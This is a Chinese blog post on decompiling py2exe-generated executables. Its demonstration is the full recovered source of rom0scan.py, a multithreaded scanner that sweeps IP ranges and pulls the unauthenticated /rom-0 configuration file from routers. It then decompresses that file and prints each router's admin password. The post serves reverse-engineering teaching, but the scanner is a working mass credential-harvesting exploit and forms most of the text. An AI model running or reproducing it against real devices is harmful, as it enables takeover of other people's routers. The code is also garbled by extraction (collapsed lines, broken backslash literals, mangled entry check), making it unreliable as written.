标题: MISC系列(41)--反编译py2exe生成的EXE文件
创建: 2015-04-30 14:28 更新: 2015-04-30 17:28 链接: https://scz.617.cn/python/201504301428.txt
目录:
☆ 背景介绍
☆ unpy2exe.py + uncompyle2
☆ Py2ExeDumper.exe + GetPyc.py + EasyPythonDecompiler.exe
☆ 一些失败的工具
☆ rom0scan.py(反编译结果展示)
☆ 反编译效果点评
☆ 多余的话
☆ 参考资源
☆ 背景介绍
参看:
《DNS系列(9)--GFW对DNS的干挠》(DNS_2.txt)
其中对比测试了四种Python转EXE的工具。
参看:
rom0scan(20150422).7z http://pan.baidu.com/s/1eQs51YE (解压密码rom0scan.exe)
GetHttpsInfo(20150422).7z http://pan.baidu.com/s/1c0ewyHU (解压密码GetHttpsInfo.exe)
《程序员的片段(2)--rom0scan.exe出台记》 https://scz.617.cn/python/201504171139.txt
在上文中我提到:
rom0scan.exe是rom0scan.py的py2exe版本。我是Windows的忠实用户,喜欢并且相信 一大票人同样喜欢绿色Windows版本。写这个工具是为了研究其他漏洞,它已经覆盖 了我的原始需求。就像superdns.exe、GetHttpsInfo.exe一样,这些小工具我自己就 在用。为了从繁重的体力劳动中解放出来,程序员就会给自己开发一些辅助工具,要 不怎么说懒惰是世界进步、人类进化的原动力之一呢。
我分享这些exe,目标人群从来都不是会自己编译源代码的群体,而是各路小白用户 或者绿色Windows版爱好者。对于会自己编译源代码的群体,你们就自力更生去吧, 广阔天地等着你们。
在GetHttpsInfo.exe的使用说明中我提到:
如被VirusTotal命中,并担心自己的小电影被我弄走的,请勿使用,弄走活该。
未上混淆手段或者反编译手段,纯属"爱心泛滥"。我就是那种为非专业人士以及小白 们考虑的泛爱人士啊,极大程度考虑到能用上的人就图个清净、省事。设若还得安装 别的依赖,那得多么不符合泛爱人士的美学。
好了,大致背景就是,我在百度网盘上以EXE形式分享了一些实用小工具。这些EXE其 实都是Python写的,为了小白们方便,更为了自己方便,我用py2exe处理后分享出来。 因为我的初衷不是保密实现,所以未上混淆手段或者反编译手段。对于内行人(有个 行字,不然成内人,那就不太妙了),这些EXE就是Python源代码。前段时间有朋友在 新浪微博上问我能否提供源代码,我笑而不语,注意这句话:
对于会自己编译源代码的群体,你们就自力更生去吧。
值此五一国际劳动节来临之际,我这种劳动模范就再做一次好人,告诉那些不明觉厉 的围观群众,什么叫"这些EXE就是Python源代码"。
请大家围观后,有钱的捧个钱场,没钱的捧个人场,顺便求第一会所邀请码一枚。
下面以rom0scan.exe为例,介绍如何反编译py2exe生成的EXE文件,得到源代码。
☆ unpy2exe.py + uncompyle2
$ unpy2exe.py -o rom0scan rom0scan.exe
这将生成"rom0scan\rom0scan.py.pyc"。
Usage: uncompyle2 [OPTIONS]... [ FILE | DIR]...
Examples: uncompyle2 foo.pyc bar.pyc # decompile foo.pyc, bar.pyc to stdout uncompyle2 -o . foo.pyc bar.pyc # decompile to ./foo.pyc_dis and ./bar.pyc_dis uncompyle2 -o /tmp /usr/lib/python1.5 # decompile whole library
Options:
-o
Debugging Options: --showasm -a include byte-code (disables --verify) --showast -t include AST (abstract syntax tree) (disables --verify)
Extensions of generated files: '.pyc_dis' '.pyo_dis' successfully decompiled (and verified if --verify) + '_unverified' successfully decompile but --verify failed + '_failed' decompile failed (contact author for enhancement)
这将生成"rom0scan\rom0scan.py.pyc_dis",也就是原始的rom0scan.py。
☆ Py2ExeDumper.exe + GetPyc.py + EasyPythonDecompiler.exe
$ Py2ExeDumper.exe rom0scan.exe
这将在当前目录下生成:
library.zip PYTHONSCRIPT
注意,PYTHONSCRIPT是一个二进制文件,还不是.pyc文件,更不是.py文件。它有个 不定长的首部,一般占0x11字节。建议用WinHex打开PYTHONSCRIPT看看,加强感性认 识。
编辑GetPyc.py如下:
!/usr/bin/env python
-- encoding: utf-8 --
Note that you have to run the script in the same version of python which
was used to generate the exe. Otherwise unmarshalling will fail.
import marshal, imp
f = open( 'PYTHONSCRIPT', 'rb' )
struct Header
{
unsigned int tag;
unsigned int optimize;
unsigned int unbuffered;
unsigned int data_bytes;
unsigned char zippath[VARIABLE_SIZE]
};
Skip the header, you have to know the header size beforehand.
f.seek( 0x11 ) ob = marshal.load( f )
for i in xrange( 0, len( ob ) ) : open( str( i ) + '.pyc', 'wb' ).write( imp.get_magic() + '\0' * 4 + marshal.dumps( ob[i] ) )
f.close()
$ GetPyc.py
这将在当前目录下生成:
0.pyc 1.pyc 2.pyc
根据大小就可以简单判断2.pyc(最大)对应原始的rom0scan.pyc。
双击执行EasyPythonDecompiler.exe([2]),这是一个GUI程序,选择反编译2.pyc, 在2.pyc所在目录下得到2.pyc_dis,这就是原始的rom0scan.py。
☆ 一些失败的工具
py2exe-extract([3])本意是从.exe中析取资源(PYTHONSCRIPT),然后从中析取.pyc。 但其实现不够鲁棒,看看源代码理解原理就好。
pyREtic([4])是原来在Immunity工作过的一哥们写的,还在BlackHat 2010上做过介 绍。参看"docs\HOWTO.md",理论上它应该可以从.pyc还原出.py。
$ REpdb.py
(REpdb:default) set_project rom0scan (REpdb:rom0scan) gen_ref (REpdb:rom0scan) gen_obf C:/Python27/Lib/site-packages (REpdb:rom0scan) remap (REpdb:rom0scan) swap_opcodes (REpdb:rom0scan) quit
$ REpdb.py
(REpdb:default) set_project rom0scan
(REpdb:rom0scan) fs_um_decompile
正常情况下应该生成:
不过它好像很久没有更新,反正我这儿没用成功。
☆ rom0scan.py(反编译结果展示)
Embedded file name: rom0scan.py
import sys, string, getopt, os, struct, socket, random, inspect, re import pycurl, Queue, itertools, collections from threading import Thread, RLock from cStringIO import StringIO
class MyException(Exception):
def __init__(self, value = None):
self.value = value
def __str__(self):
return str(self.value)
def __repr__(self):
return repr(self.value)
def itos32(num): return struct.pack('=I', int(num & 4294967295L))
def uint16(num): return int(struct.unpack('=H', struct.pack('=H', int(num & 65535)))[0])
def uint32(num): return int(struct.unpack('=I', struct.pack('=I', int(num & 4294967295L)))[0])
def readb16(buf, index): if index < 0: index += len(buf) return int(struct.unpack('>H', buf[index:index + 2])[0])
def readstr(buf, index): if index < 0: index += len(buf) return buf[index:].split('\x00')[0]
def resolvehost(host): try: ret = uint32(int(struct.unpack('>I', socket.inet_aton(socket.gethostbyname(host)))[0])) except: ret = 0
return ret
def dosomething(str): str += '\x00' xxx = '' i = 0 while i < len(str) - 1: if '\' != str[i]: xxx += str[i] elif i + 1 >= len(str): xxx += str[i] elif '\' == str[i + 1]: xxx += '\' i += 1 elif 'r' == str[i + 1]: xxx += '\r' i += 1 elif 'n' == str[i + 1]: xxx += '\n' i += 1 elif 't' == str[i + 1]: xxx += '\t' i += 1 elif '0' == str[i + 1]: xxx += '\x00' i += 1 elif 'x' == str[i + 1]: if str[i + 2] >= '0' and str[i + 2] <= '9' or str[i + 2] >= 'a' and str[i + 2] <= 'f' or str[i + 2] >= 'A' and str[i + 2] <= 'F': i += 2 tmp = str[i] if str[i + 1] >= '0' and str[i + 1] <= '9' or str[i + 1] >= 'a' and str[i + 1] <= 'f' or str[i + 1] >= 'A' and str[i + 1] <= 'F': i += 1 tmp += str[i] else: tmp = '0' + tmp xxx += tmp.decode('hex_codec') else: xxx += str[i] else: xxx += str[i] i += 1
return xxx
def AnyToSth(src, dst = 'utf_8'): codelist = ['utf_8', 'gb2312', 'gbk', 'gb18030', 'big5', 'latin_1'] ret = '(error)' for c in codelist: try: ret = src.decode(c).encode(dst) break except UnicodeDecodeError: pass except UnicodeEncodeError: pass
return ret
class BitReader():
def __init__(self, bytes):
self.__bits__ = collections.deque()
for byte in bytes:
byte = ord(byte)
for i in xrange(8):
self.__bits__.append(byte >> 7 - i & 1)
def getBit(self):
return self.__bits__.popleft()
def getBits(self, num):
ret = 0
for i in xrange(num):
ret += self.getBit() << num - 1 - i
return ret
def getLength(self):
length = 2
while True:
i = self.getBits(2)
length += i
if not (3 == i and length < 8):
break
if 8 == length:
while True:
i = self.getBits(4)
length += i
if 15 != i:
break
return length
def LZSDecompress(data): reader = BitReader(data) result = '' while True: bit = reader.getBit() if not bit: byte = reader.getBits(8) result += chr(byte) continue bit = reader.getBit() if 1 == bit: offset = reader.getBits(7) else: offset = reader.getBits(11) if 1 == bit and 0 == offset: break if offset > len(result): break length = reader.getLength() for i in xrange(length): result += result[-offset]
return result
QueueInWorkerExit = False
class QueueInWorker(Thread):
def __init__(self, queue_in, queue_out, httpheader = [], proxypool = [], noproxy = 'localhost,127.0.0.1', referer = '', followlocation = 1, maxredirs = 5, redir_protocols = 3, protocols = 3, connecttimeout = 30, timeout = 30, connect_max = 16, monitor = False, port = None):
super(QueueInWorker, self).__init__()
self.queue_in = queue_in
self.queue_out = queue_out
self.httpheader = httpheader
self.proxypool = proxypool
self.noproxy = noproxy
self.referer = referer
self.followlocation = followlocation
self.maxredirs = maxredirs
self.redir_protocols = redir_protocols
self.protocols = protocols
self.connecttimeout = connecttimeout
self.timeout = timeout
self.connect_max = connect_max
self.monitor = monitor
self.port = port
self.m = pycurl.CurlMulti()
self.m.cpool = []
self.setDaemon(True)
def __del__(self):
if self.m is not None:
for c in self.m.cpool:
if c.host is not None:
c.host = None
if c.head is not None:
c.head.close()
c.head = None
if c.body is not None:
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
self.m.cpool = []
self.m.close()
self.m = None
return
def c_init(self, c):
c.setopt(pycurl.HTTPHEADER, self.httpheader)
if len(self.proxypool) > 0:
c.setopt(pycurl.PROXY, random.choice(self.proxypool))
c.setopt(pycurl.NOPROXY, self.noproxy)
if self.referer is None:
c.setopt(pycurl.AUTOREFERER, 0)
elif '' == self.referer:
c.setopt(pycurl.AUTOREFERER, 1)
else:
c.setopt(pycurl.REFERER, self.referer)
c.setopt(pycurl.FOLLOWLOCATION, self.followlocation)
c.setopt(pycurl.MAXREDIRS, self.maxredirs)
c.setopt(pycurl.REDIR_PROTOCOLS, self.redir_protocols)
c.setopt(pycurl.PROTOCOLS, self.protocols)
c.setopt(pycurl.NOSIGNAL, 1)
c.setopt(pycurl.CONNECTTIMEOUT, self.connecttimeout)
c.setopt(pycurl.TIMEOUT, self.timeout)
c.setopt(pycurl.ENCODING, '')
if self.port is not None:
c.setopt(pycurl.PORT, self.port)
return
def run(self):
global QueueInWorkerExit
random.seed()
while True:
num = len(self.m.cpool)
if not QueueInWorkerExit and num < self.connect_max:
num = self.connect_max - num
for i in xrange(num):
try:
host = self.queue_in.get(True, 1)
if host is None:
QueueInWorkerExit = True
break
else:
if self.monitor:
sys.stderr.write('%40s\r%s\r' % (' ', host))
c = pycurl.Curl()
self.c_init(c)
c.host = host
c.setopt(pycurl.URL, 'http://%s/rom-0' % host)
c.head = StringIO()
c.setopt(pycurl.HEADERFUNCTION, c.head.write)
c.body = StringIO()
c.setopt(pycurl.WRITEFUNCTION, c.body.write)
self.m.cpool.append(c)
self.m.add_handle(c)
except Queue.Empty:
break
num = len(self.m.cpool)
if 0 == num:
if QueueInWorkerExit:
self.queue_out.put(None)
break
else:
continue
while True:
ret, num_ret = self.m.perform()
if pycurl.E_CALL_MULTI_PERFORM != ret:
break
while True:
num_ret, ok_list, error_list = self.m.info_read()
for c in ok_list:
head = AnyToSth(c.head.getvalue())
if '(error)' == head:
server = '(error)'
else:
try:
server = re.search('Server: ([^\\r\\n]+)', head, re.U).group(1)
server = AnyToSth(server, 'gbk')
except AttributeError:
server = None
code = c.getinfo(pycurl.HTTP_CODE)
password = None
if 200 == code:
buf = c.body.getvalue()
end = len(buf)
index = 8192
while index + 20 <= end:
name = readstr(buf, index + 6)
if 'autoexec.net' == name:
offset = readb16(buf, index + 4) + 12 + 4
size = readb16(buf, index + 2) - 12 - 4
if 8192 + offset > end or 8192 + offset + size > end:
break
data = LZSDecompress(buf[8192 + offset:8192 + offset + size])
if len(data) > 20:
password = readstr(data, 20)
break
index += 20
self.queue_out.put((c.host,
code,
server,
password))
c.host = None
c.head.close()
c.head = None
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
for c, errno, errmsg in error_list:
c.host = None
c.head.close()
c.head = None
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
if 0 == num_ret:
break
self.m.select(1.0)
return
QueueTmpWorkerExit = False QueueTmpNoneNum = 0 QueueTmpRLock = RLock()
class QueueTmpWorker(Thread):
def __init__(self, queue_in, queue_out, num_fetch, httpheader = [], proxypool = [], noproxy = 'localhost,127.0.0.1', referer = '', followlocation = 1, maxredirs = 5, redir_protocols = 3, protocols = 3, connecttimeout = 30, timeout = 30, connect_max = 16, port = None):
super(QueueTmpWorker, self).__init__()
self.queue_in = queue_in
self.queue_out = queue_out
self.num_fetch = num_fetch
self.httpheader = httpheader
self.proxypool = proxypool
self.noproxy = noproxy
self.referer = referer
self.followlocation = followlocation
self.maxredirs = maxredirs
self.redir_protocols = redir_protocols
self.protocols = protocols
self.connecttimeout = connecttimeout
self.timeout = timeout
self.connect_max = connect_max
self.port = port
self.m = pycurl.CurlMulti()
self.m.cpool = []
self.setDaemon(True)
def __del__(self):
if self.m is not None:
for c in self.m.cpool:
if c.data is not None:
c.data = None
if c.head is not None:
c.head.close()
c.head = None
if c.body is not None:
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
self.m.cpool = []
self.m.close()
self.m = None
return
def c_init(self, c):
c.setopt(pycurl.HTTPHEADER, self.httpheader)
if len(self.proxypool) > 0:
c.setopt(pycurl.PROXY, random.choice(self.proxypool))
c.setopt(pycurl.NOPROXY, self.noproxy)
if self.referer is None:
c.setopt(pycurl.AUTOREFERER, 0)
elif '' == self.referer:
c.setopt(pycurl.AUTOREFERER, 1)
else:
c.setopt(pycurl.REFERER, self.referer)
c.setopt(pycurl.FOLLOWLOCATION, self.followlocation)
c.setopt(pycurl.MAXREDIRS, self.maxredirs)
c.setopt(pycurl.REDIR_PROTOCOLS, self.redir_protocols)
c.setopt(pycurl.PROTOCOLS, self.protocols)
c.setopt(pycurl.NOSIGNAL, 1)
c.setopt(pycurl.CONNECTTIMEOUT, self.connecttimeout)
c.setopt(pycurl.TIMEOUT, self.timeout)
c.setopt(pycurl.ENCODING, '')
if self.port is not None:
c.setopt(pycurl.PORT, self.port)
return
def run(self):
global QueueTmpWorkerExit
global QueueTmpNoneNum
random.seed()
while True:
num = len(self.m.cpool)
if not QueueTmpWorkerExit and num < self.connect_max:
num = self.connect_max - num
for i in xrange(num):
try:
data = self.queue_in.get(True, 1)
if data is None:
QueueTmpRLock.acquire()
QueueTmpNoneNum += 1
QueueTmpRLock.release()
if self.num_fetch == QueueTmpNoneNum:
QueueTmpWorkerExit = True
break
else:
c = pycurl.Curl()
self.c_init(c)
c.data = data
c.setopt(pycurl.URL, 'http://%s/' % data[0])
c.head = StringIO()
c.setopt(pycurl.HEADERFUNCTION, c.head.write)
c.body = StringIO()
c.setopt(pycurl.WRITEFUNCTION, c.body.write)
c.setopt(pycurl.CUSTOMREQUEST, 'HEAD')
c.setopt(pycurl.NOBODY, True)
self.m.cpool.append(c)
self.m.add_handle(c)
except Queue.Empty:
break
num = len(self.m.cpool)
if 0 == num:
if QueueTmpWorkerExit:
self.queue_out.put(None)
break
else:
continue
while True:
ret, num_ret = self.m.perform()
if pycurl.E_CALL_MULTI_PERFORM != ret:
break
while True:
num_ret, ok_list, error_list = self.m.info_read()
for c in ok_list:
code = c.getinfo(pycurl.HTTP_CODE)
if 401 == code:
head = AnyToSth(c.head.getvalue())
if '(error)' == head:
model = '(error)'
else:
try:
model = re.search('WWW-Authenticate: Basic realm="(.+?)"', c.head.getvalue(), re.U).group(1)
model = AnyToSth(model, 'gbk')
except AttributeError:
model = None
else:
model = '(%u)' % code
self.queue_out.put((c.data[0],
c.data[1],
c.data[2],
c.data[3],
model))
c.data = None
c.head.close()
c.head = None
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
for c, errno, errmsg in error_list:
model = '(%u:%s)' % (errno, errmsg)
self.queue_out.put((c.data[0],
c.data[1],
c.data[2],
c.data[3],
model))
c.data = None
c.head.close()
c.head = None
c.body.close()
c.body = None
self.m.remove_handle(c)
self.m.cpool.remove(c)
c.close()
if 0 == num_ret:
break
self.m.select(1.0)
return
class QueueOutWorker(Thread):
def __init__(self, queue_in, num_fetch, quiet = False):
super(QueueOutWorker, self).__init__()
self.queue_in = queue_in
self.num_fetch = num_fetch
self.quiet = quiet
self.setDaemon(True)
def __del__(self):
pass
def run(self):
num_none = 0
while True:
data = self.queue_in.get()
if data is None:
num_none += 1
if self.num_fetch == num_none:
break
else:
host = data[0]
code = data[1]
server = data[2]
password = data[3]
model = data[4]
if server is None:
server = ''
if password is None:
password = ''
if model is None:
model = ''
try:
if self.quiet:
if '' != password:
sys.stdout.write('%-15s [%s] [%s]\n' % (socket.gethostbyname(host), model, password))
else:
sys.stdout.write('%-15s [%u] [%s] [%s] [%s]\n' % (socket.gethostbyname(host),
code,
server,
model,
password))
except socket.gaierror:
pass
return
def main(prog, args): from msvcrt import setmode setmode(0, os.O_BINARY) setmode(1, os.O_BINARY) setmode(2, os.O_BINARY)
def usage(prog):
sys.stderr.write('Usage: ' + prog + ' [-h|--help] [-v] [-q] [-m] [-b begin] [-e end] [--port port]\n' + ' [--head head] [-s second] [-c connectnum] [-t threadnum] [infile|-]\n')
raise SystemExit
try:
opts, args = getopt.getopt(args, 'hvb:c:e:mqs:t:', ['help', 'head=', 'port='])
except getopt.GetoptError:
usage(prog)
if 0 == len(opts) and 0 == len(args):
usage(prog)
second = 30
threadnum = 8
connectnum = 16
begin = 0
end = 0
monitor = False
quiet = False
port = None
head = None
try:
for x, y in opts:
if x in ('-h', '--help'):
usage(prog)
elif '-v' == x:
sys.stdout.write('%s ver 2015-04-22 11:22\n' % prog)
sys.exit(0)
elif '-b' == x:
begin = resolvehost(y)
elif '-c' == x:
try:
connectnum = uint32(int(y, 0))
except ValueError:
raise MyException('Line[%u]: ValueError : Checking your [-c connectnum]' % sys.exc_info()[2].tb_lineno)
elif '-e' == x:
end = resolvehost(y)
elif '--head' == x:
head = dosomething(y)
elif '-m' == x:
monitor = True
elif '--port' == x:
port = uint16(int(y, 0))
elif '-q' == x:
quiet = True
elif '-s' == x:
try:
second = uint32(int(y, 0))
except ValueError:
raise MyException('Line[%u]: ValueError : Checking your [-s second]' % sys.exc_info()[2].tb_lineno)
elif '-t' == x:
try:
threadnum = uint32(int(y, 0))
except ValueError:
raise MyException('Line[%u]: ValueError : Checking your [-t threadnum]' % sys.exc_info()[2].tb_lineno)
else:
usage(prog)
if 0 == second:
raise MyException('Line[%u]: Checking your [-s second]' % inspect.currentframe().f_lineno)
if not 0 < connectnum * threadnum <= 256:
raise MyException('Line[%u]: invalid number of concurrent connections' % inspect.currentframe().f_lineno)
if 0 == port:
raise MyException('Line[%u]: Checking your [-p port]' % inspect.currentframe().f_lineno)
if 0 == begin and 0 == len(args):
raise MyException('Line[%u]: Checking your [-b begin]' % inspect.currentframe().f_lineno)
if 0 == end:
end = begin + 1
else:
end = end + 1
httpheader = ['User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)', 'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*']
if head is not None:
httpheader += [ h.strip() for h in head.split('\n') ]
queue_in = Queue.Queue(1024)
queue_tmp = Queue.Queue(1024)
queue_out = Queue.Queue(4096)
for i in xrange(threadnum):
QueueInWorker(queue_in, queue_tmp, httpheader=httpheader, connect_max=connectnum, connecttimeout=second, timeout=second, monitor=monitor, port=port, proxypool=[]).start()
QueueTmpWorker(queue_tmp, queue_out, num_fetch=threadnum, httpheader=httpheader, connect_max=connectnum, connecttimeout=second, timeout=second, port=port, proxypool=[]).start()
qoworker = QueueOutWorker(queue_out, threadnum, quiet)
qoworker.start()
if len(args) > 0:
if '-' == args[0]:
while True:
try:
target = string.strip(raw_input())
queue_in.put(target)
except EOFError as e:
queue_in.put(None)
break
else:
try:
infile = open(args[0], 'r')
except IOError as e:
raise MyException('Line[%u]: IOError : %s' % (sys.exc_info()[2].tb_lineno, str(e)))
for target in infile:
target = string.strip(target)
queue_in.put(target)
infile.close()
queue_in.put(None)
else:
for ip in itertools.islice(itertools.count(begin), end - begin):
tail = ip & 255
if not tail or 255 == tail:
continue
queue_in.put(socket.inet_ntoa(itos32(socket.ntohl(ip))))
queue_in.put(None)
qoworker.join()
except MyException as e:
sys.stderr.write('%s\n' % e.value)
raise SystemExit
return
if 'main' == name: try: main(os.path.basename(sys.argv[0]), sys.argv[1:]) except KeyboardInterrupt: pass
☆ 反编译效果点评
前述反编译结果已经相当到位,除了理论上就无法还原的我那BT的代码风格。它这个 代码风格只能说是符合Python语法。
在《程序员的片段(2)--rom0scan.exe出台记》中,我提到:
几乎可以确定,Python版本的LZS解压缩代码存在某些细小的BUG。有时尽管其解压结 果并不正确,但由于析取口令的代码逻辑有一定容错性,导致对于某些rom-0析取口 令成功,从另一些rom-0则析取出多余的无效数据。Filippo Valsorda的代码显然没 有得到广泛测试,一直没有更新过。我尝试给他发邮件反馈BUG,没有得到回应。无 奈之下,我只能自己阅读LZS算法:
Lempel Ziv Stac (LZS) http://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Stac
没有仔细分析Filippo Valsorda的代码,大致觉得有几处不靠谱:
1)
处理编码后的length时,代码逻辑不够清晰。从前述对比测试用例看,很可能是取 length时有BUG。
2)
BitReader.init()中为什么要用bool()做强制类型转换?完全不必要。
3)
LZSDecompress()中的window形参没必要出现,从而class RingList没必要存在。
最后我照着LZS算法的维基描述以及其C版本实现重写了Python版本实现,不想修改 Filippo Valsorda的代码,太不合我的味口了。
LZS解压算法正确的Python实现参看反编译结果中的:
class BitReader def LZSDecompress()
☆ 多余的话
那些过去索要过superdns.exe、GetHttpsInfo.exe源代码的兄弟,不要说我没有理你。
我真地是一个很善良的人。
☆ 参考资源
[1] Extract .pyc files from executables created with py2exe https://github.com/matiasb/unpy2exe
uncompyle2 converts Python byte-code back into equivalent Python source code
https://github.com/Mysterie/uncompyle2
[2] Py2ExeDumper is a tool to extract a py2exe generated executable file http://sourceforge.net/projects/py2exedumper
Easy Python Decompiler is python bytecode decompiler, decompiles pyc & pyo files
http://sourceforge.net/projects/easypythondecompiler
(只有二进制,没有源代码,这是一个GUI程序)
[3] py2exe-extract https://code.google.com/p/py2exe-extract/
[4] pyREtic is an extensible framework for in-memory Python bytecode reverse engineering https://github.com/MyNameIsMeerkat/pyREtic